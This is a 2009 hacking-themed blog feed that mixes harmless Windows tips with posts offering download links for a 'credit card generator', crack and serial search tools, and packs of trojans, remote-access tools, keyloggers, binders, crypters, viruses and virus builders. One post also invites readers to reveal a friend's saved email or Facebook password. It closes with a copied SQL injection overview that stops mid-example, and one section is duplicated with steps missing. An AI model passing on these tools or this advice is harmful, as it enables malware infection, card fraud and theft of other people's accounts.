Way of Hacker

Create Windows Icons (ICO Files) using SimplyIcon

2009-12-15T12:13:00.000-08:00

Are you looking for a way to quickly create Windows icons from photos or images stored on your computer? Maybe you want to convert a picture of a friend into an icon that you can use for a hard drive!

Or maybe not. Either way, converting pictures or images into ICO format is now really easy. No need for Photoshop or an image editor and manually shrinking files to the right size, correct color mode, etc.

Previously, I wrote about a program called ImagIcon, which let you convert images into Windows icons for free. Also, I wrote about Iconfu, a website where you can create and edit icons online for free.

Recently, I just ran into another nifty Windows utility for creating icons (.ICO files). The program is super small, requires no installation (which means you can copy it to a USB stick), and generates icons from any type of picture file.

SimplyIcon is a simple program that lets you drag and drop images onto the program, which will then automatically convert them into Windows icons files.

create ico files

Just drag your image file onto the program screen and it will generate four different Windows icons for you. The sizes are 128×128, 32×32, 24×24, and 16×16. If your file is larger than 128×128 pixels, the program will generate that size also, otherwise just the smaller three sizes.

generate ico files

Pretty neat eh! The program will generate the ICO files in the same folder where the original image is stored and with the same name.

windows icon files

Above is the original image and the 16×16 version of that image. Also, you should try to use images that are as close to square as possible since the images will be down-sampled and if they are rectangular, then the icons will look stretched.

You may want to crop an image before converting it to an icon if the result looks stretched. Overall, it’s a pretty simple application which doesn’t do a lot, but if you are looking for a really easy way to create Windows icons without having to install software, SimplyIcon is perfect! Enjoy!

How to track the original location of an email via its IP address

2009-12-15T12:12:00.000-08:00

Here’s a quick how-to guide on how you can track email to it’s originating location by figuring out the email’s IP address and looking it up. I have found this to be quite useful on many occasions for verification purposes since I receive lots of emails daily due to my blog. Tracking the IP address of an email sender does require looking at some technical details, so be ready to dig your heels in!

There are basically two steps involved in the process of tracking an email: find the IP address in the email header section and then look up the location of the IP address.
Finding the IP address of an email sender in GMail, Yahoo Mail, and Outlook

Let’s go ahead and take a look at how you would do this for Google, Yahoo and Outlook since those are the most popular email clients.

Google’s Gmail

1. Log into your account and open the email in question.

2. Click on the down arrow that’s to the right of the Reply link. Choose Show Original from the list.

track emails

Now here’s the technical part that I was telling you about earlier! You need to look for the lines of text that start with “Received: from“. It might be easier to simply press Cntrl + F and perform a search for that phase. You’ll notice that there are several Received From’s in the message header. This is because the message header contains the IP addresses of all of servers
involved in routing that email to you.

message header

To find the first computer that originally sent the email, you’ll have to find the Received From that’s farthest DOWN. As you can see from the above image, the first one is from a computer called “aseem” with the IP address 72.204.154.191. Then it was routed to my ISP’s server at eastrmmtao104.cox.net and so on and so forth till it got to your email server.

The computer aseem is my personal home computer and that’s my public IP address for my house! I’ll go through Yahoo and Outlook before talking about tracking the location of that IP address.

Yahoo Mail Beta

1. Log into your account and open the email (if you’re using Yahoo Mail Beta with the new preview interface, make sure you double-click on the email so that it opens in a new tab)

2. At the top right, you’ll see there is a drop-down option where Standard Header is selected by default.

3. Click on it and choose Full Header.

yahoo header

Again, you’ll see the same information as before, just in a different window:

message headers

Microsoft Outlook

1. Open the email in Outlook by double-clicking on it

2. Go to View at the top menu (the menu options for the email, not the main Outlook window) and choose Options.

outlook message headers

You’ll get a dialog box where you can set the message options and at the bottom you’ll see the Internet Headers box. For some silly reason, the box is very small and you have to scroll a lot, so it’s best to simply copy and paste the text into Notepad to view it more easily.

internet headers
Tracking the location of an IP address

Now that we have our originating IP address of 72.204.154.191, let’s find out where that is! You can do this by perform a location lookup on the IP address. My favorites are IP2Location and GeoBytes IP Locator.

GeoBytes gave me a big map of New Orleans, LA along with a bunch of other information about the location itself.

find ip address location

IP2Location also gave me the same information pretty much, including the ISP (Cox Communications). Of course, this is correct since I live in New Orleans!

If you want more information, you can do a WHOIS database search also. My favorite one is the ARIN WHOIS Database Search. This will give you information on who hosts that IP address and their registration information. You can always contact them to try and find more information on that particular IP address.

Have fun tracking down those emails! Questions, comments, or suggestions? Post a comment!

How to format USB drive and memory stick with NTFS

2009-12-15T11:49:00.000-08:00

If you have ever tried to format a USB thumb drive or memory stick,
you may have noticed that the only options you get are FAT and FAT32
file systems. This is the default behavior in Windows XP. However, with some slight tweaking of settings, you can actually format your removable storage devices in NTFS format, including external hard drives, etc.

Of course, there is a reason why Windows defaults the formatting of
removable storage to FAT and FAT32. There are actually a few advantages
and disadvantages to formatting a USB drive in NTFS format, so we’ll go
through those before actually talking about how to do it.

The advantages of enabling NTFS of removable storage devices
are mostly security related. For example, an NTFS file system lets you
to add allow and deny permissions on individual files and folders for
specific Windows users, something you cannot do in the FAT file system.
But that’s not all in terms of security. You can also encrypt files using Windows XP’s built-in encryption.

Other benefits include the ability to compress files and therefore
save space on your USB drive. You can also set disk quotas and even
create partitions! Formatting USB drives in NTFS has several advantages
that would be good if you need to use some of these advanced features,
i.e. for your IT department or if you’re just paranoid!

However, there are also a few drawbacks to using NFTS on a USB
drive. Firstly, there is a lot more writing to the drive that is
required when using NTFS and therefore your access to the device will
be slower. Will it make a major difference that would prevent people
from using it? Probably not, but it’s something to consider. Also,
versions of Windows older than 2000 cannot read NTFS file systems, nor
can most Linux systems.

The other major downside is that if you encrypt your files on the
USB drive, you will not be able to open them anywhere else. Actually,
this can be considered a downside or an upside depending on what you
want to do. If you want to secure your USB stick so that only your user
account on your one computer can open the files, then encrypting is perfect. If not, then do not encrypt the files.

How to format USB drive with NTFS

First, connect your USB device to your computer. Then right-click on My Computer from the desktop and choose Manage.

Next click on Device Manager and then expand out Disk Drives. You should see your USB drive listed there as “Generic USB 2.0 USB Drive” or something similar.

Now right-click on the USB drive under Disk Drives and choose Properties. Then go to the Policies tab.

Now you will see two options, the “Optimize for quick removal” selected by default. Go ahead and change that by selecting the “Optimize for performance” option. This enables writing caching on the drive and therefore allows you to format it as NTFS! Sweet.

That’s it. Now click OK and then go to My Computer. Right click on
the drive in My Computer and choose Format. In the File System drop
down you will now see the option for NTFS!

You can now secure your USB flash drive or external USB hard drive in any way you like! Enjoy! Source: PCtipsBox

How to format USB drive with NTFS

First, connect your USB device to your computer. Then right-click on My Computer from the desktop and choose Manage.

Next click on Device Manager and then expand out Disk Drives. You should see your USB drive listed there as “Generic USB 2.0 USB Drive” or something similar.

Now right-click on the USB drive under Disk Drives and choose Properties. Then go to the Policies tab.

That’s it. Now click OK and then go to My Computer. Right click on
the drive in My Computer and choose Format. In the File System drop
down you will now see the option for NTFS!

You can now secure your USB flash drive or external USB hard drive in any way you like! Enjoy! Source: PCtipsBox

Eject USB Device via a Shortcut or Hotkey

2009-12-15T11:43:00.001-08:00

If you’re like me, you might have 10 devices connected to your computer via USB: a keyboard, mouse, external hard drive, USB flash drive, wireless USB card, etc, etc. Wouldn’t it be nice if there was a quick and simple way to eject a USB device?

You can, of course, use the Windows Safely Remove Hardware feature, but if you’re a geek and really want to eject a device without having to click 5 times, keep reading!

USB Disk Ejector is an awesome app I just ran across that allows you to quickly remove any USB device from your computer. What’s neat is that it has a GUI interface, but also can be run from the command line!

If you hate that “It is now safe to remove this device” message that Windows gives you, then check out this program. Originally, it only supported pen drives, but now it supports external USB drives, Firewire drives, card readers, flash memory cards, etc.

And what I like best is that you can assign a hotkey to instantly eject a specific USB device. If you’d rather a desktop shortcut, you can do that also using the command line version. I’ll walk you through both methods.

First, download and run the app. It requires no install, which is great. It’ll automatically detect the USB devices and give you a list of them in a small window.

In order to eject a device quickly using the GUI, just double-click on any USB device. Or select it and press Enter. Note that you can also minimize the program and it will run in your system tray.

Now for the fun part! Click on the More link at the bottom and choose Options. Here you’ll be able to customize the options for USB Disk Ejector.

Under Features, you can choose to search for memory cards also if you use those. By default, Windows Notifications are disabled, but if you want them for some reason, you can check that box.

You can also choose the option to close the app or minimize it after ejecting a device and whether you want to automatically close or be asked to close any programs that might be running from the USB drive itself.

At the bottom is where it gets nice. Here you can assign hotkeys to eject a drive by letter or by name and choose the hotkey and drive letter. You can use multiple keys for the hotkey, such as Ctrl + Shift + 1, etc.

Pretty neat! Now what about creating a shortcut? First copy the EXE file to a location on your hard disk that is easily accessible via the command prompt, like C:\Utilities, etc.

Then open a new command prompt and navigate to that directory and type in the following command:

USB_Disk_Eject /?

The usage is pretty straight-forward. To remove a USB drive with the letter F, you would simply type in USB_DISK_EJECT /removeletter F. Pretty simple, eh? So how do you use this to create a shortcut?

Go to your desktop, right-click, choose New and then choose Shortcut.

For the location, go ahead and click Browse and then find the USB_DISK_EJECT.EXE file and select it. In the path, you will have to append the parameters we mentioned above, i.e. /removeletter F.

C:\Utilities\USB_Disk_Eject.exe /removeletter F

Click Next and give your shortcut a name like “Eject F Drive” or something that makes sense. That’s it! Now just double-click on it and your drive will be ejected without any notifications, etc. The shortcut will get the USB logo that came with the program, which is nice.

So if you really want a fast way to eject your USB devices, you can use the GUI interface, setup a hotkey or create a shortcut! Enjoy!

How to Access Blocked Websites

2009-12-04T12:04:00.000-08:00

We suggest workarounds to bypass internet filters and corporate firewalls to help you unblock access to restricted websites at universities or office

Blocking access to undesirable Web sites has been a common government tactic but China, Iran, Saudi Arabia are believed to extend greater censorship over the net than any other country in the world.

Most of the blocked or blacklisted sites in Saudi Arabia are about sex, religion, women, health, politics and pop culture. They even block access to websites that sell bathing suits. In China, webites containing sexually explicit content are blocked plus sites on sensitive topics such as Tibet, Taiwan, and dissident activity.

Other popular sites that are often blocked in offices, school and workplaces are Google News, Typepad, Orkut, ebay, Blogger blogs, YouTube, Blogger, Facebook, MySpace, Pandora, Bebo, Photobucket, Yahoo! Messenger, AOL AIM, Flickr, last.fm, etc.

There are however always legitimate reasons to bypass the internet filters and visit the blocked websites. The following methods will help you access blocked websites in school, college, office or at home.

Approach 1: There are websites Anonymizer who fetch the blocked site/ page from their servers and display it to you. As far as the service provider is concerned you are viewing a page from Anonymizer and not the blocked site.

Approach 2: To access the blocked Web site. type the IP number instead of the URL in the address bar. But if the ISP software maps the IP address to the web server (reverse DNS lookup), the website will remain blocked.

Approach 3: Use a URL redirection service like tinyurl.com or snipurl.com. These domain forward services sometimes work as the address in the the url box remain the redirect url and do not change to the banned site.

Access Google Talk Chat or GMail in Office

Approach 4: Use Google Mobile Search. Google display the normal HTML pages as if you are viewing them on a mobile phone. During the translation, Google removes the javascript content and CSS scripts and breaks a longer page into several smaller pages. Google Mobile

Use Mobile browsers as proxy to open restricted websites

Approach 5: Enter the URL in Google or Yahoo search and then visit the cached copy of the page. To retrieve the page more quickly from Google’s cache, click “Cached Text Only” while the browser is loading the page from cache.

Approach 6: You can access blocked or restricted websites by using Google language tools service as a proxy server. Basically, you have Google translate your page from English to English (or whatever language you like). Assuming that Google isn’t blacklisted in your country or school, you should be able to access any site with this method. Google Proxy

Unblock restricted websites that require login

Approach 7: Anonymous Surfing – Browse the internet via a proxy server. A proxy server (or proxies) is a normal computer that hides the identity of computers on its network from the Internet. Which means that only the address of the proxy server is visible to the world and not of those computers that are using it to browse the Internet. Just visit the proxy server website with your Web browser and enter a URL (website address) in the form provided.

Unblock access to Bebo, Myspace, Orkut, Facebook

Get Firefox with Google Toolbar for better browsing

We recommend Firefox web browser for a faster browsing experience. It’s more safe and integrated with the Google Web search.

How To Get Cracks and Serials to Any Program & Google Hacks

2009-12-04T11:52:00.000-08:00

How To Get Cracks and Serials to Any Program & Google Hacks

Download Craagle from:
http://www.mediafire.com/download.php?2imygmy3mia (recommended)

http://www.megaupload.com/?d=YR8DPZTJ
http://rapidshare.com/files/129293716/Craagle.exe.html

Craagle
: Now you can search every sort of cracks, serials and covers,without
falling into shit like toolbars, popups, spyware, adware, malware.

* Crack Sites Supported :

Cracks.Am,
KeyGen.Us, AllCracks.Net, Andr.Net, Crack.Ms,Crackz.Ws,
CrackArchive.Com, CrackDb.Com, CrackzPlanet.Com,CrackWay.Com,
MsCracks.Com, CrackPortal.Com, TheCracks.Us,KeyGen.Ru

* Serial Sites Supported :

Seriall.Com,
FreeSerials.Com, SerialSite.Com, Serials.Ws, Andr.Net, SerialKey.Net,
SerialArchive.Com, CrackzPlanet.Com,MsCracks.Com, CrackPortal.Com,
KeyGen.Name, TheKeys.Ws,FreeSerials.Ws, FreeSerials.Spb.Ru,
Serial.220volt.Info,SerialCodes.Net

* Cover Site Supported :

CoverTarget.Com, CoverAll.Come.To, CoverIsland.Com

* Note:
Don't go to any of the following sites:
These are the sites that craagle goes to so you dont have to! That's the WHOLE IDEA!!!!!!!

You can also use a proxy to bypass Day Limit for some sites.

**********************************

Download Google Hacks v.1.0 from:
http://www.mediafire.com/download.php?ezmzjknyzjj

Download Google Hacks v.1.6 from:
http://www.mediafire.com/download.php?zzwkvwgqmi3

Use this to search files you didn't think were possible!

Google
Hacks is a compact utility that will allow its users to search google
using different google search hacks. Using Google Hacks one can easily
do a music search by using a highly optimized and complex search
command that can be obtained just by clicking a number of option boxes
that can be found in the programґs interface.

Download your
favourite Music, Books, Videos, Tools, Hacks, Proxies, Lyrics,
Applications, Torrents, Images, Misc in any format you want FOR FREE
using Google

Credit Card Generator (Hack a Credit Card Number)

2009-12-04T11:42:00.001-08:00

Credit Card Generator

*Please Note:
I am not responsible for the results of any actions taken by you or anyone else using this software

Download from:
http://www.speedyshare.com/791541363.html
http://www.mediafire.com/download.php?hm3wmyzynt1

Top 15 Security/Hacking Tools & Utilities

2009-12-04T09:54:00.000-08:00

1. Nmap

I think everyone has heard of this one, recently evolved into the 4.x series.

Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.

Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.

Get Nmap Here

2. Nessus Remote Security Scanner

Recently went closed source, but is still essentially free. Works with a client-server framework.

Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

Get Nessus Here

3. John the Ripper

Yes, JTR 1.7 was recently released!

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

You can get JTR Here

4. Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).

Get Nikto Here

5. SuperScan

Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.

If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.

Get SuperScan Here

6. p0f

P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:

- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.

Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.

Get p0f Here

7. Wireshark (Formely Ethereal)

Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.

Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.

Get Wireshark Here

8. Yersinia

Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).

The best Layer 2 kit there is.

Get Yersinia Here

9. Eraser

Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.

An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.

Get Eraser Here.

10. PuTTY

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.

Get PuTTY Here.

11. LCP

Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.

A good free alternative to L0phtcrack.

Get LCP Here

12. Cain and Abel

My personal favourite for password cracking of any kind.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.

Get Cain and Abel Here

13. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

A good wireless tool as long as your card supports rfmon (look for an orinocco gold).

Get Kismet Here

14. NetStumbler

Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.

NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:

* Verify that your network is set up the way you intended.
* Find locations with poor coverage in your WLAN.
* Detect other networks that may be causing interference on your network.
* Detect unauthorized “rogue” access points in your workplace.
* Help aim directional antennas for long-haul WLAN links.
* Use it recreationally for WarDriving.

Get NetStumbler Here

15. hping

To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

Get hping Here

Yah I’ve stayed away from commercial products in this article, perhaps I’ll cover those another day.

The Most Dangerous Hack Tools Ready For Download

2009-12-04T09:49:00.000-08:00

The Most Dangerous Hack Tools Ready For Download

Download from:
http://www.mediafire.com/download.php?tzigjnxmx1j
http://rapidshare.com/files/105797649/Ultimate__Hacking_2007_byAK_EXOR.rar

Password = crazy-coderz.net

This pack includes:

Trojan Horses
- Yuri RAT v1.2
- MofoTro v1.7 BETA
- Charon
- Beast v2.0.7
- Omerta v1.3
- Theef v2.10
- Combined Forces R.A.T
- MoSucker v3.0
- ProRat v1.9 Fix2
More...

Keyloggers
- Elite Keylogger v1.0
- SKL v0.1
- KeySpy v2.0
- A++++
- Curiosity
- Keylogger
- KeyCopy

Binders
- Daemon Crypt Public v2
- NT Packer v2.1
- EES binder v1.0
- File Injector v3
- Bytes Adder
- FreshBind v2.01
- YAB v2.01
- NakedBind v1.0
- Amok Joiner

WebHacks/WordLists

Brute Forcers
- Munga Bunga 's Official
- Brutus - Authentication Engine Test 2
- wwwHack v1.946
- FTP Brute Hacker
- FTP Brute Forcer.tar.gz - Unix
- Wbrute.tar.gz - Unix
- Shadow Scanner-Brute Forcer
- Hackers Utility v1.5
- POP3 brute forcer.tar.gz - Unix

CGI-Bug Scanners
- NStealth HTTP Security Scanner v5.8
- Attack Toolkit v4.1 & source code included
- Scanarator
- Legion NetBios Scanner v2.1
- NetView v1.0
- CGI Vulnerability Scan
- CGI Scanner v4.0
- VoidEye CGI scanner

Virus!

Viruses
- Hippi virus
- Sasser
- W32. Blaster .Worm
- Midnight Massacre
- 00001
- Nimda
- Loveletter virus
- Happy '99
- MXZ

Virus Builders
- DR VBS
- VBSwg 2 beta - Virus builder
- p0ke's WormGen 2.0
- RESIDUO - DoS Virus

MSN Hacks & Bots
- HoaX Toolbox 1.1
- MSN Extreme 3.0
- MessenPass v1.06
- Advanced Blood Scroller
- Nudge Madness
- Advanced Instant Messengers Password Recovery
- Contact Spy
- Msn Explosion
- Encrypted Messenger

Port & IP Scanners
- Blues Port Scanner
- ProPort v2.2
- SuperScan v3.0
- Net Scan Tools v4.2
- LanSpy v2.0
- Bitchin Threads v3.1
- Trojan Hunter v1.5
- SuperScan v4.0
- Neotrace PRO v3.25 trial&crack

Nukers And Flooders
- Rocket v1.0
- RPCNuke v1.0
- Panther Mode1 - 56k
- Panther Mode2 - ISDN +
- Final Fortune v2.4
- Battle Pong - Technophoria
- Assault v1.0
- ICMP Nuker
- CLICK v2.2

EXTRA!
- Telnet Tutorial

Be Careful As There is Alot of Very Dangerous Tools in That Pack

The Best Hacking Programs and Tools (Net Tools,Keyloggers,Icon Changers,Binders,Crypters,Passwords)

2009-12-04T09:47:00.000-08:00

The Best Hacking Programs and Tools

* Please Note:
I didn't upload all of the tools and i don't know if all of them are virus-free.Pls scan the tools for viruses before run

* Download Net Tools 5.0 (DDoS Tools and More)
http://www.mediafire.com/download.php?0ogm0mddzmj
The Official site:
http://users.telenet.be/ahmadi/nettools.htm

Net Tools is a comprehensive set of host monitoring, network scanning, security, administration tools and much more, all with a highly intuitive user interface. It's an ideal tool for those who work in the network security, administration, training, internet forensics or law enforcement internet crimes fields. Net Tools is mainly written in Microsoft Visual Basic 6, Visual C++, Visual C# and Visual Studio .NET.

* One BILLION MD5 hashes
http://gdataonline.com/seekhash.php
For more information about what is MD5 hash visit these sites:
http://en.wikipedia.org/wiki/MD5
http://en.wikipedia.org/wiki/Hash_function

* Keyloggers

- Ardamax Keylogger
http://www.mediafire.com/download.php?lda40ezzayz
- 007 Keylogger
http://rapidshare.com/files/148091298/007install3.90.rar

* Downloaders

- UNK downloader V2
http://www.megaupload.com/?d=7IDQRZCN

* Icon Changers

- uNk Icon Changer
http://www.megaupload.com/?d=B09UGPDE

* Binders

- Amok Joiner
http://www.megaupload.com/?d=17EH92ZO
- Elannan Moussa Binder
http://www.megaupload.com/?d=DDD1I74I
- exe/jpg/doc File Binder
http://www.megaupload.com/?d=E4LGUTRN
- Freshbind
http://www.megaupload.com/?d=DRGBZKYG
- IDE spinner
http://www.megaupload.com/?d=5KR9Z2J1
- Infector NG Binder
http://www.megaupload.com/?d=YAAS0S92
- Newjoin
http://www.megaupload.com/?d=8ISJSWTN
- Scrambler
http://www.megaupload.com/?d=JL69NLY2
- YAB (Yet another binder)
http://www.megaupload.com/?d=ZC2XNEUP
- OverLoad Binder
http://www.megaupload.com/?d=3EA9C0E3
- uBinder
http://www.megaupload.com/?d=KFCAOTZE

* Crypters

- James's Crypter
http://rapidshare.com/files/148015639/James_s_Crypter_2.0b.rar.html
- Eye Crypter Public edition
http://www.megaupload.com/?d=CTR0O1SX
- HackHound
http://www.megaupload.com/?d=ZK8GTEDC
- Acid Burns
http://rapidshare.com/files/98269452/AC_Crypter_Privat.rar

* Passwords/Keyloggers

- Digital Keylogger v3.3
http://www.megaupload.com/?d=H4D6FOE0
- Yahoo Spy v.2
- Yahoo Spy Launcher v2.0
http://www.mediafire.com/download.php?4hhizmnlydj

* Rat's mega thread

This is a big thread with a lot of good rats in it.
The rat may not be safe so be sure to scan and run it in a sandboxie first if you want to be sure it's not backdoored.

- ProRat SE v1.9
http://rapidshare.com/files/119647407/ProRatSE.rar.html
- Turkojan v4.0 Gold
http://rapidshare.com/files/120899117/Turkojan-gold.rar
- Poison Ivy 2.3.2
http://www.poisonivy-rat.com/dl.php?file=PI232
- Nuclear Rat 2.1.0
http://www.nuclearwintercrew.com/Products-Download/21/Nuclear_RAT_2.1.0/
(PASSWORD: NWC)
- Bandook Rat v1.35
http://www.nuclearwintercrew.com/Products-Download/57/Bandook_RAT_v1.35__NEW_/
(PASSWORD: NWC)
- Shark Rat v3.0.0
http://www.fileden.com/files/2008/5/2/1893883/sharK_3.rar
- Sub7
http://www.sub7legends.com/
- Pain Rat v0.1 Beta 9
http://www.mediafire.com/?ytijmzlymvo
(PASSWORD: HackTheDarkness.com)
- Lost door v2.2 bug fixed
http://rapidshare.com/files/150837365/Lost_Door_V2.2_Stable_Public_edition.zip.html
- xHacker Pro 3.0
http://rapidshare.com/files/60827684/xHacker.3..rar
- Spy-net v0.5.1
http://rapidshare.com/files/150669029/Spy-Net.zip.html
- Hav-RAT 1.3.2
http://havalito-rat.com/downloads.php?download=http://www.havalito-rat.com/downloads/HR1.3.2.zip&ID=Hav-RAT%201.3.2

Rapidshare Time Resetter (unlimited rapidshare)

2009-12-04T09:41:00.000-08:00

HackOshit
RapidShare Time Resetter
With this program You can download from rapidshare with no limits!
When rapidshare tells you you have exceeded the limit just run this tool.

DOWNLOAD

Enjoy

ONLY WORKS FOR PEOPLE WITH A DYNAMIC IP!

How to Hide a File in Drive

2009-12-04T09:36:00.000-08:00

http://www.softwaregeek.com/images/icons/encryption_shield_utilities_security___encryption-87340.jpeg
How to Hide a file in Drive
Steps to do it
Go to
All Programs =>Accessories=>Command Prompt
Type your Drive in which the folder is kept
e.g E Drive, songs (folder name which you want to hide)

E: (dont forget to type Colon) then Enter
then type
attrib songs +s +h then Enter
then see the magic

If you want to unhide it
the same procedure but in the place of attrib songs +s +h put -s -h

How to Create an Invisible Folder in Windows XP

2009-12-04T09:29:00.000-08:00

http://www.techpavan.com/wp-content/uploads/2008/02/invisible-folder-selected.gif
You Can Make Any Folder Invisible Without Using Any Software Or Program Just Follow These Steps:

1. Right click where ever you want the invisible folder to be and select create a new folder.

2 Right Click on the folder and hit rename. Erase the name of the folder so there is nothing there.

3. If you try to stop here windows will tell you that you need to provide a name. So to get around this with the name field still active hold down ALT and press 0160 on the number pad (make sure Num Lock is on), release alt

You should now have a blank name with nothing but a folder next to it

4. Now click on the nameless folder and right click. Select Properties.

5. Go to the Customize tab.

6. Find and press the Change Icon button. Scroll through the icons until you find one that has no image.

7. Hit OK and you have an invisible folder!

With the invisible folder you can hide what ever undesirables you have. Be it video games at work, pictures of your family or anything else you can think of “wink”.

The folder will show up for a brief second if you put it on your desktop. For that reason it might be smart to place it inside a folder or amongst a group of folders.

How To Break Password Behind The Stars *******

2009-12-04T09:27:00.000-08:00

In this post i'll show you how to see passwords behind the asterisks*******, in case you forgot what you used or better if you want to know yours friend password from his email or facebook account that he had typed and left it. This tutorial will help you.

1)How to break hidden passwords ***** in Mozilla Firefox

All you have to do is just to copy/paste the following javascript code in the adress bar whenever you are on a site with a login form and the password behind the ****** will be displayed.

I want to show you another trick to view all of the stored passwords in Firefox.

1. Open Firefox

2. Go to Tools –> Options.

3. Select the Security Tab.

4. Click on Saved Passwords.

5. If you want to look at the passwords, press 'Show Passwords'.

2)How to break hidden passwords ******** in Internet Explorer

Download Asterisk Key and run it. When you are on a site with a login form click Show Internet Explorer Passwords and it will show you the password behind the *****.

2)How to break hidden passwords ***** in some applications

There is a freeware utility called SC-PassUnleash which allows you to read any of the passwords that are covered by the asterisks by simply dragging a cursor over such a password field. But, the bad thing is that it only works on certain FTP clients and email clients.

Download SC-PassUnleash

Hope this tutorial was useful for you.

SQL Injection

2009-12-04T09:16:00.000-08:00

Overview
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

Threat Modeling
SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
SQL Injection is very common with PHP and ASP applications due to the prevalence of older functional interfaces. Due to the nature of programmatic interfaces available, J2EE and ASP.NET applications are less likely to have easily exploited SQL injections.
The severity of SQL Injection attacks is limited by the attacker’s skill and imagination, and to a lesser extent, defense in depth countermeasures, such as low privilege connections to the database server and so on. In general, consider SQL Injection a high impact severity.
Related Security Activities
How to Avoid SQL Injection Vulnerabilities
See the OWASP Guide article on how to Avoid SQL Injection Vulnerabilities.
See the OWASP SQL Injection Prevention Cheat Sheet.

How to Review Code for SQL Injection Vulnerabilities
See the OWASP Code Review Guide article on how to Review Code for SQL Injection Vulnerabilities.

How to Test for SQL Injection Vulnerabilities
See the OWASP Testing Guide article on how to Test for SQL Injection Vulnerabilities.

Description
SQL injection errors occur when:

Data enters a program from an untrusted source.
The data used to dynamically construct a SQL query
The main consequences are:

Confidentiality: Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL Injection vulnerabilities.
Authentication: If poor SQL commands are used to check user names and passwords, it may be possible to connect to a system as another user with no previous knowledge of the password.
Authorization: If authorization information is held in a SQL database, it may be possible to change this information through the successful exploitation of a SQL Injection vulnerability.
Integrity: Just as it may be possible to read sensitive information, it is also possible to make changes or even delete this information with a SQL Injection attack.
Risk Factors
The platform affected can be:

Language: SQL
Platform: Any (requires interaction with a SQL database)
SQL Injection has become a common issue with database-driven web sites. The flaw is easily detected, and easily exploited, and as such, any site or software package with even a minimal user base is likely to be subject to an attempted attack of this kind.

Essentially, the attack is accomplished by placing a meta character into data input to then place SQL commands in the control plane, which did not exist there before. This flaw depends on the fact that SQL makes no real distinction between the control and data planes.

Examples
Example 1
In SQL:

select id, firstname, lastname from authors
If one provided:

Firstname: evil'ex
Lastname: Newman
the query string becomes:

